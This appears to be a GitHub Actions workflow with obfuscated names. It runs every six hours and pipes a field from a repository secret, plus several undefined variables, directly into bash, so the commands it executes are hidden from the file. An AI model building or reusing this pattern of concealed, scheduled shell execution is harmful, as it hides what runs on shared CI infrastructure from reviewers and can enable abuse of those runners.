name: lujiancheng2345
on:
  workflow_dispatch:
  schedule:
    - cron: '52 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lujiancheng2345
        env:
          y37946: ${{ secrets.y37946 }}
        run: |
          echo $y37946 | jq -r .awta37755 | /bin/bash
          echo $s543 | jq -r .d5191 | /bin/bash
          echo $gx84 | jq -r .cyu749 | /bin/bash
          echo $ghr33 | jq -r .otpy42 | /bin/bash
          echo $ak4 | jq -r .p2511 | /bin/bash
          echo $f9035 | jq -r .gzbpq0148 | /bin/bash

